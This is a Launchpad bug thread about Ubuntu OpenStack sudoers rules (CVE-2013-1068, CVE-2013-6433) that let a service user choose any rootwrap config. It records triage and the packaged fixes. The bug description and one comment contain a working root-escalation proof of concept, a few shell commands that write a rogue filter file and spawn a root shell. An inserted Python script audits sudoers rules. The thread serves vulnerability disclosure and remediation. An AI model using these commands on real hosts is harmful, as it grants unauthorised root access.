rootwrap sudoers configuration does not follow packaging guidelines

Bug #1185019 reported by Darragh O'Reilly on 2013-05-28
Affects            Importance   Assigned to
cinder (Ubuntu)    High         Chuck Short
  Saucy            High         Jamie Strandboge
  Trusty           High         Jamie Strandboge
  Utopic           High         Chuck Short
ironic (Ubuntu)    Undecided    Unassigned
  Utopic           Undecided    Unassigned
manila (Ubuntu)    Undecided    Unassigned
  Utopic           Undecided    Unassigned
neutron (Ubuntu)   High         Chuck Short
  Saucy            High         Jamie Strandboge
  Trusty           High         Jamie Strandboge
  Utopic           High         Chuck Short
nova (Ubuntu)      High         Chuck Short
  Saucy            High         Jamie Strandboge
  Trusty           High         Jamie Strandboge
  Utopic           High         Chuck Short

Bug Description

The rootwrap packaging guidelines at https://wiki.openstack.org/wiki/Packager/Rootwrap say that the sudoers file should have:

nova ALL = (root) NOPASSWD: /usr/bin/nova-rootwrap /etc/nova/rootwrap.conf *

But on Ubuntu 12.10 it is:

# cat /etc/sudoers.d/nova_sudoers
Defaults:nova !requiretty

nova ALL = (root) NOPASSWD: /usr/bin/nova-rootwrap

Now if an attacker somehow gets a shell under user nova they can specify any argument for nova-rootwrap:

$ id
uid=108(nova) gid=113(nova) groups=113(nova),112(libvirtd)
$
$ echo [DEFAULT] >/tmp/my-rootwrap.conf
$ echo filters_path=/tmp/my-filters.d >>/tmp/my-rootwrap.conf
$
$ mkdir /tmp/my-filters.d
$ echo [Filters] >/tmp/my-filters.d/my.filters
$ echo my-shell: CommandFilter, /bin/sh, root >>/tmp/my-filters.d/my.filters
$
$ sudo nova-rootwrap /tmp/my-rootwrap.conf sh
#
# id
uid=0(root) gid=0(root) groups=0(root)

The same goes for the quantum_sudoers from quantum-common.

# lsb_release -rd
Description: Ubuntu 12.04 LTS
Release: 12.04

# apt-cache policy nova-common
nova-common:
  Installed: 1:2013.1-0ubuntu2.1~cloud0
  Candidate: 1:2013.1-0ubuntu2.1~cloud0
  Version table:
 *** 1:2013.1-0ubuntu2.1~cloud0 0
        500 http://ubuntu-cloud.archive.canonical.com/ubuntu/ precise-updates/grizzly/main amd64 Packages
        100 /var/lib/dpkg/status
     2012.1.3+stable-20130423-e52e6912-0ubuntu1.1 0
        500 http://mirror.sov.uk.goscomb.net/ubuntu/ precise-updates/main amd64 Packages
        500 http://security.ubuntu.com/ubuntu/ precise-security/main amd64 Packages
     2012.1-0ubuntu2 0
        500 http://mirror.sov.uk.goscomb.net/ubuntu/ precise/main amd64 Packages
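
The misconfiguration described in this report (a sudoers rule that names the rootwrap binary but not its config file) can be checked for mechanically. The following is an added example, not part of the bug report or of the Ubuntu packaging: it scans sudoers text for *-rootwrap rules and flags any that do not pin the service's own /etc/<service>/rootwrap.conf followed by "*", which is the shape the packaging guideline requires. SAMPLE_SUDOERS is a constructed input built from the 12.10 entry quoted above plus one corrected entry.

```python
"""Audit sudoers rules for OpenStack rootwrap entries.

Added example, not part of the bug report: flags rules like
    nova ALL = (root) NOPASSWD: /usr/bin/nova-rootwrap
which let the service user supply any rootwrap.conf (and therefore any
filters_path), and accepts only the guideline shape
    nova ALL = (root) NOPASSWD: /usr/bin/nova-rootwrap /etc/nova/rootwrap.conf *
Rules written without a (runas) list are outside the regex and are skipped.
"""
import re
from typing import List, Tuple

# <user> <hosts> = (<runas>) [TAG: ...] <command> [args]
_RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?:(?P<tags>(?:[A-Z_]+:\s*)+))?(?P<cmd>\S+)(?:\s+(?P<args>.*))?$"
)


def audit_sudoers(text: str) -> List[Tuple[str, str]]:
    """Return (rule, reason) for every *-rootwrap rule that is not pinned."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blanks
        if not line or line.startswith("Defaults"):
            continue
        m = _RULE.match(line)
        if not m or not m.group("cmd").endswith("-rootwrap"):
            continue
        service = m.group("cmd").rsplit("/", 1)[-1][: -len("-rootwrap")]
        args = (m.group("args") or "").split()
        expected = f"/etc/{service}/rootwrap.conf"
        if not args:
            findings.append((line, "no argument restriction: any rootwrap.conf accepted"))
        elif args[0] != expected:
            findings.append((line, f"config path {args[0]!r} is not {expected}"))
        elif args[1:] != ["*"]:
            # Without the trailing '*' the real invocations (conf + command) no longer match.
            findings.append((line, "missing trailing '*' after the pinned rootwrap.conf"))
    return findings


# Constructed sample: the 12.10 entry from the report beside a corrected one.
SAMPLE_SUDOERS = """\
Defaults:nova !requiretty

nova ALL = (root) NOPASSWD: /usr/bin/nova-rootwrap
cinder ALL = (root) NOPASSWD: /usr/bin/cinder-rootwrap /etc/cinder/rootwrap.conf *
"""

if __name__ == "__main__":
    for rule, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"UNPINNED: {rule}\n    {reason}")
```

Run it over the contents of /etc/sudoers.d/*_sudoers on a host to list every rootwrap rule still in the vulnerable form.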


Changed in nova (Ubuntu Quantal):
status: New → Triaged
importance: Undecided → High
Changed in nova (Ubuntu Raring):
status: New → Triaged
importance: Undecided → High
Changed in nova (Ubuntu Saucy):
status: New → Triaged
importance: Undecided → High
Changed in nova (Ubuntu Trusty):
status: New → Triaged
importance: Undecided → High
Jamie Strandboge (jdstrand) wrote :

Thanks for your bug report, I can confirm this.

Changed in cinder (Ubuntu Quantal):
status: New → Triaged
importance: Undecided → High
Changed in cinder (Ubuntu Raring):
status: New → Triaged
importance: Undecided → High
Changed in cinder (Ubuntu Saucy):
status: New → Triaged
importance: Undecided → High
Changed in cinder (Ubuntu Trusty):
status: New → Triaged
importance: Undecided → High
no longer affects: quantum (Ubuntu Saucy)
no longer affects: quantum (Ubuntu Trusty)
Jamie Strandboge (jdstrand) wrote :

Confirmed to affect cinder.

Jamie Strandboge (jdstrand) wrote :

Confirmed to affect quantum (does not exist in 13.10 and higher).

Changed in quantum (Ubuntu Quantal):
status: New → Triaged
importance: Undecided → High
Changed in quantum (Ubuntu Raring):
status: New → Triaged
importance: Undecided → High
Changed in quantum (Ubuntu):
status: New → Invalid
summary: - nova_sudoers and quantum_sudoers do not follow packaging guidelines
+ rootwrap sudoers configuration does not follow packaging guidelines
Marc Deslauriers (mdeslaur) wrote :

This is CVE-2013-1068

Jamie Strandboge (jdstrand) wrote :

Sorry for all the bug noise-- there is a bug in launchpad where if I remove a task in one source I can't add it back in another source, so I had to start over.

no longer affects: cinder (Ubuntu)
no longer affects: cinder (Ubuntu Quantal)
no longer affects: cinder (Ubuntu Raring)
no longer affects: cinder (Ubuntu Saucy)
no longer affects: cinder (Ubuntu Trusty)
no longer affects: neutron (Ubuntu Raring)
no longer affects: neutron (Ubuntu Quantal)
no longer affects: neutron (Ubuntu)
no longer affects: quantum (Ubuntu)
no longer affects: quantum (Ubuntu Quantal)
no longer affects: quantum (Ubuntu Raring)
no longer affects: cinder (Ubuntu)
no longer affects: nova (Ubuntu Trusty)
no longer affects: nova (Ubuntu Saucy)
no longer affects: nova (Ubuntu Raring)
no longer affects: nova (Ubuntu Quantal)
Jamie Strandboge (jdstrand) wrote :

neutron does not exist in 12.10 and 13.04.

Changed in neutron (Ubuntu Quantal):
status: New → Invalid
Changed in neutron (Ubuntu Raring):
status: New → Invalid
Jamie Strandboge (jdstrand) wrote :

quantum does not exist in 13.10 or 14.04

Changed in quantum (Ubuntu Saucy):
status: New → Invalid
Changed in quantum (Ubuntu Trusty):
status: New → Invalid
Changed in cinder (Ubuntu Quantal):
status: New → Triaged
importance: Undecided → High
Changed in cinder (Ubuntu Raring):
status: New → Triaged
importance: Undecided → High
Changed in cinder (Ubuntu Saucy):
status: New → Triaged
importance: Undecided → High
Changed in cinder (Ubuntu Trusty):
status: New → Triaged
importance: Undecided → High
Changed in neutron (Ubuntu Saucy):
status: New → Triaged
importance: Undecided → High
Changed in neutron (Ubuntu Trusty):
status: New → Triaged
importance: Undecided → High
Changed in nova (Ubuntu Quantal):
status: New → Triaged
importance: Undecided → High
Changed in nova (Ubuntu Raring):
status: New → Triaged
importance: Undecided → High
Changed in nova (Ubuntu Saucy):
status: New → Triaged
importance: Undecided → High
Changed in quantum (Ubuntu Quantal):
status: New → Triaged
importance: Undecided → High
Changed in quantum (Ubuntu Raring):
status: New → Triaged
importance: Undecided → High
Jamie Strandboge (jdstrand) wrote :

I did an archive grep of trusty and found that cinder, quantum, nova and neutron are all affected. I'll do another grep for quantal, raring and saucy. Also, Debian is affected and I bet other distros might be too, so this will need distro coordination.

Jamie Strandboge (jdstrand) wrote :

Attached is a reproducer based on the bug description. This does not need a working openstack to demonstrate the vulnerability. All that is needed is installing *-common. Eg:
 * nova-common
 * cinder-common
 * quantum-common
 * neutron-common

$ sudo -u cinder /tmp/CVE-2013-1068.sh # Ubuntu 13.04
Running as cinder
$ id
uid=110(cinder) gid=118(cinder) groups=118(cinder)
$ cat /tmp/cinder/my-rootwrap.conf
[DEFAULT]
filters_path=/tmp/cinder/my-filters.d
$ cat /tmp/cinder/my-filters.d/my.filters
[Filters]
my-shell: CommandFilter, /bin/sh, root
$ sudo -K
$ sudo -n cinder-rootwrap /tmp/cinder/my-rootwrap.conf sh -c id
uid=0(root) gid=0(root) groups=0(root)
FAIL

$ sudo -u nova /tmp/CVE-2013-1068.sh # Ubuntu 13.04
Running as nova
$ id
uid=112(nova) gid=120(nova) groups=120(nova),122(libvirtd)
$ cat /tmp/nova/my-rootwrap.conf
[DEFAULT]
filters_path=/tmp/nova/my-filters.d
$ cat /tmp/nova/my-filters.d/my.filters
[Filters]
my-shell: CommandFilter, /bin/sh, root
$ sudo -K
$ sudo -n nova-rootwrap /tmp/nova/my-rootwrap.conf sh -c id
uid=0(root) gid=0(root) groups=0(root)
FAIL

$ sudo -u quantum /tmp/CVE-2013-1068.sh # Ubuntu 13.04
Running as quantum
$ id
uid=117(quantum) gid=124(quantum) groups=124(quantum)
$ cat /tmp/quantum/my-rootwrap.conf
[DEFAULT]
filters_path=/tmp/quantum/my-filters.d
$ cat /tmp/quantum/my-filters.d/my.filters
[Filters]
my-shell: CommandFilter, /bin/sh, root
$ sudo -K
$ sudo -n quantum-rootwrap /tmp/quantum/my-rootwrap.conf sh -c id
uid=0(root) gid=0(root) groups=0(root)
FAIL

$ sudo -u neutron /tmp/CVE-2013-1068.sh # Ubuntu 13.10
Running as neutron
$ id
uid=117(neutron) gid=125(neutron) groups=125(neutron)
$ cat /tmp/neutron/my-rootwrap.conf
[DEFAULT]
filters_path=/tmp/neutron/my-filters.d
$ cat /tmp/neutron/my-filters.d/my.filters
[Filters]
my-shell: CommandFilter, /bin/sh, root
$ sudo -K
$ sudo -n neutron-rootwrap /tmp/neutron/my-rootwrap.conf sh -c id
uid=0(root) gid=0(root) groups=0(root)
FAIL

Jamie Strandboge (jdstrand) wrote :

Quantum and Neutron have been assigned CVE-2013-6433.

Jamie Strandboge (jdstrand) wrote :

quantal and raring are now EOL so removing those tasks. Removing quantum since it only existed in EOL releases.

Changed in quantum (Ubuntu Quantal):
status: Triaged → Won't Fix
no longer affects: quantum (Ubuntu Quantal)
no longer affects: quantum (Ubuntu Raring)
no longer affects: cinder (Ubuntu Quantal)
no longer affects: cinder (Ubuntu Raring)
no longer affects: neutron (Ubuntu Quantal)
no longer affects: neutron (Ubuntu Raring)
no longer affects: nova (Ubuntu Quantal)
no longer affects: nova (Ubuntu Raring)
no longer affects: quantum (Ubuntu)
no longer affects: quantum (Ubuntu Saucy)
no longer affects: quantum (Ubuntu Trusty)
Jamie Strandboge (jdstrand) wrote :

This also affects ironic and manila (both community supported (universe) and both new in 14.04). manila is currently uninstallable on 14.04.

Changed in ironic (Ubuntu Utopic):
status: New → Triaged
Changed in manila (Ubuntu Utopic):
status: New → Triaged
Changed in nova (Ubuntu Saucy):
status: Triaged → Fix Committed
Changed in nova (Ubuntu Trusty):
status: Triaged → Fix Committed
Changed in neutron (Ubuntu Saucy):
status: Triaged → Fix Committed
Changed in neutron (Ubuntu Trusty):
status: Triaged → Fix Committed
Changed in cinder (Ubuntu Saucy):
status: Triaged → Fix Committed
Changed in cinder (Ubuntu Trusty):
status: Triaged → Fix Committed
Changed in cinder (Ubuntu Saucy):
assignee: nobody → Jamie Strandboge (jdstrand)
Changed in cinder (Ubuntu Trusty):
assignee: nobody → Jamie Strandboge (jdstrand)
Changed in nova (Ubuntu Saucy):
assignee: nobody → Jamie Strandboge (jdstrand)
Changed in nova (Ubuntu Trusty):
assignee: nobody → Jamie Strandboge (jdstrand)
Changed in neutron (Ubuntu Saucy):
assignee: nobody → Jamie Strandboge (jdstrand)
Changed in neutron (Ubuntu Trusty):
assignee: nobody → Jamie Strandboge (jdstrand)
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package nova - 1:2014.1-0ubuntu1.2

---------------
nova (1:2014.1-0ubuntu1.2) trusty-security; urgency=medium

  * SECURITY UPDATE: specify /etc/nova/rootwrap.conf for use with
    nova-rootwrap
    - CVE-2013-1068 (LP: #1185019)
 -- Jamie Strandboge <email address hidden> Mon, 09 Jun 2014 09:32:44 -0500

Changed in nova (Ubuntu Trusty):
status: Fix Committed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package nova - 1:2013.2.3-0ubuntu1.2

---------------
nova (1:2013.2.3-0ubuntu1.2) saucy-security; urgency=medium

  * SECURITY UPDATE: no change rebuild for security
    - CVE-2013-4463 (LP: #1206081)
    - CVE-2013-4469 (LP: #1206081)
    - CVE-2013-7130 (LP: #1251590)
    - CVE-2014-0134 (LP: #1221190)
    - CVE-2014-0167 (LP: #1290537)
  * SECURITY UPDATE: specify /etc/nova/rootwrap.conf for use with
    nova-rootwrap
    - CVE-2013-1068 (LP: #1185019)
 -- Jamie Strandboge <email address hidden> Mon, 09 Jun 2014 09:29:12 -0500

Changed in nova (Ubuntu Saucy):
status: Fix Committed → Fix Released
Changed in cinder (Ubuntu Utopic):
assignee: nobody → Chuck Short (zulcss)
Changed in nova (Ubuntu Utopic):
assignee: nobody → Chuck Short (zulcss)
Changed in neutron (Ubuntu Utopic):
assignee: nobody → Chuck Short (zulcss)
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package nova - 1:2014.2~b1-0ubuntu2

---------------
nova (1:2014.2~b1-0ubuntu2) utopic; urgency=medium

  * SECURITY UPDATE: specify /etc/nova/rootwrap.conf for use with
    nova-rootwrap
    - CVE-2013-1068 (LP: #1185019)
 -- Chuck Short <email address hidden> Wed, 18 Jun 2014 11:17:52 -0400

Changed in nova (Ubuntu Utopic):
status: Triaged → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package cinder - 1:2014.2~b1-0ubuntu2

---------------
cinder (1:2014.2~b1-0ubuntu2) utopic; urgency=medium

  * SECURITY UPDATE: specify /etc/nova/rootwrap.conf for use with
    nova-rootwrap
    - CVE-2013-1068 (LP: #1185019)
 -- Chuck Short <email address hidden> Wed, 18 Jun 2014 11:37:45 -0400

Changed in cinder (Ubuntu Utopic):
status: Triaged → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package cinder - 1:2013.2.3-0ubuntu1.1

---------------
cinder (1:2013.2.3-0ubuntu1.1) saucy-security; urgency=medium

  * SECURITY UPDATE: specify /etc/cinder/rootwrap.conf for use with
    cinder-rootwrap
    - CVE-2013-1068 (LP: #1185019)
 -- Jamie Strandboge <email address hidden> Mon, 09 Jun 2014 09:43:48 -0500

Changed in cinder (Ubuntu Saucy):
status: Fix Committed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package cinder - 1:2014.1-0ubuntu1.1

---------------
cinder (1:2014.1-0ubuntu1.1) trusty-security; urgency=medium

  * SECURITY UPDATE: specify /etc/cinder/rootwrap.conf for use with
    cinder-rootwrap
    - CVE-2013-1068 (LP: #1185019)
 -- Jamie Strandboge <email address hidden> Mon, 09 Jun 2014 09:45:12 -0500

Changed in cinder (Ubuntu Trusty):
status: Fix Committed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package neutron - 1:2014.2~b1-0ubuntu3

---------------
neutron (1:2014.2~b1-0ubuntu3) utopic; urgency=medium

  * SECURITY UPDATE: specify /etc/neutron/rootwrap.conf for use with
    nova-rootwrap
    - CVE-2013-1068 (LP: #1185019)
 -- Chuck Short <email address hidden> Wed, 18 Jun 2014 12:43:51 -0400

Changed in neutron (Ubuntu Utopic):
status: Triaged → Fix Released
Adam Conrad (adconrad) on 2014-06-24
information type: Private Security → Public Security
information type: Public Security → Private Security
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package neutron - 1:2013.2.3-0ubuntu1.5

---------------
neutron (1:2013.2.3-0ubuntu1.5) saucy-security; urgency=medium

  * SECURITY UPDATE: specify /etc/neutron/rootwrap.conf for use with
    neutron-rootwrap
    - CVE-2013-6433 (LP: #1185019)
  * SECURITY UPDATE: Validate CIDR given as ip-prefix in
    security-group-rule-create
    - CVE-2014-0187
    - LP: #1300785
  * debian/patches/CVE-2014-0187b.patch: update for python-netaddr <= 0.7.10
  * SECURITY UPDATE: Install SNAT rules for ipv4 only
    - CVE-2014-4167
    - LP: #1309195
 -- Jamie Strandboge <email address hidden> Wed, 18 Jun 2014 16:15:47 -0500

Changed in neutron (Ubuntu Saucy):
status: Fix Committed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package neutron - 1:2014.1-0ubuntu1.3

---------------
neutron (1:2014.1-0ubuntu1.3) trusty-security; urgency=medium

  * SECURITY UPDATE: specify /etc/neutron/rootwrap.conf for use with
    neutron-rootwrap
    - CVE-2013-6433 (LP: #1185019)
  * SECURITY UPDATE: Validate CIDR given as ip-prefix in
    security-group-rule-create
    - CVE-2014-0187
    - LP: #1300785
  * debian/patches/CVE-2014-0187b.patch: update for python-netaddr <= 0.7.10
  * SECURITY UPDATE: Install SNAT rules for ipv4 only
    - CVE-2014-4167
    - LP: #1309195
 -- Jamie Strandboge <email address hidden> Wed, 18 Jun 2014 16:12:37 -0500

Changed in neutron (Ubuntu Trusty):
status: Fix Committed → Fix Released
information type: Private Security → Public
James Page (james-page) wrote :

cinder + neutron had this bug referenced in the changelog for the uploads jdstrand did on top of 2014.1.1 - marking verification-done as testing has been completed on the proposed version

tags: added: verfication-done

The verification of the Stable Release Update for cinder has completed successfully and the package has now been released to -updates. Subsequently, the Ubuntu Stable Release Updates Team is being unsubscribed and will not receive messages about this bug report. In the event that you encounter a regression using the package from -updates please report a new bug using ubuntu-bug and tag the bug report regression-update so we can easily find any regressions.

Corey Bryant (corey.bryant) wrote :

Chris' statement also applies to neutron and nova.

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package ironic - 2014.2~rc1-0ubuntu1

---------------
ironic (2014.2~rc1-0ubuntu1) utopic; urgency=medium

  [ Adam Gandelman ]
  * New upstream release.
  * debian/patches/set_logdir.patch: Renamed to set_config_defaults.patch,
    also set default sqlite db connection.
  * debian/control: Refreshed dependencies for Juno, wrap-and-sort.
  * debian/ironic-common.install: Added ironic-nova-bm-migrate binary.
  * debian/ironic-common.postinst: Create the default sqlite database if
    configured to use it and it does not exist.
  * debian/pydist-overrides: Add pysendfile.
  * debian/ironic_sudoers: Add rootwrap.conf (LP: #1185019).

  [ James Page ]
  * d/rules,control: Increase test verbosity using subunit.
 -- Adam Gandelman <email address hidden> Tue, 30 Sep 2014 10:44:08 -0700

Changed in ironic (Ubuntu Utopic):
status: Triaged → Fix Released
James Page (james-page) wrote :

OK in vivid:

manila ALL = (root) NOPASSWD: /usr/bin/manila-rootwrap /etc/manila/rootwrap.conf *

Changed in manila (Ubuntu):
status: Triaged → Fix Released
Changed in manila (Ubuntu Utopic):
status: Triaged → Won't Fix